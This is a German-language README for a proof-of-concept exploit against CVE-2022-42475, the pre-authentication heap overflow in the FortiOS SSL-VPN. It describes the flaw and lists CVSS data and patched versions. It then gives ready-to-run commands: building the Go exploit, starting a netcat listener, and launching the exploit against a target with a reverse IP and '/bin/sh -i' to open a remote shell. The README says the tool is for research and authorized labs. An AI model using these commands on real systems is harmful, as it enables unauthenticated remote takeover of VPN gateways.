
Proof of Concept (PoC) für Forschung und kontrollierte Laborvalidierung von CVE-2022-42475, einer kritischen Heap-basierten Pufferüberlauf-Schwachstelle, die den SSL-VPN-Dienst in bestimmten Versionen von FortiOS betrifft.
Fortinet SSL VPN Remote-Codeausführung vor der Authentifizierung
CVE-2022-42475 ist eine Schwachstelle (Heap-basierter Pufferüberlauf) im SSL-VPN-Dienst von FortiOS, die es nicht authentifizierten Angreifern ermöglicht, über speziell gestaltete HTTP-Anfragen an den Endpunkt /remote/error beliebigen Code remote auszuführen (RCE).
Diese Schwachstelle wurde vor der Veröffentlichung des offiziellen Patches aktiv in freier Wildbahn ausgenutzt (0-Day).
Der folgende Screenshot zeigt die Ausführung der PoC in einer autorisierten Laborumgebung:
Die Ausgabe zeigt die Ausführung der PoC und die Interaktion mit der für die Tests verwendeten FortiOS-Instanz.

| Feld | Wert |
|---|
| CVE ID | CVE-2022-42475 |
| CVSS 3.1 | 9.3 (Critical) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 |
| Entdeckt | Dezember 2022 |
| Offizieller Patch | FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16 |
# Quelldatei klonen oder herunterladen
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc
# Kompilieren
go build -o exploit exploit.go
# Oder direkt ausführen
go run exploit.go <target> <port> <reverse_ip> <params>
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]
# Auf dem Angreifer-Listener starten
nc -lvnp 80
# Exploit ausführen
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i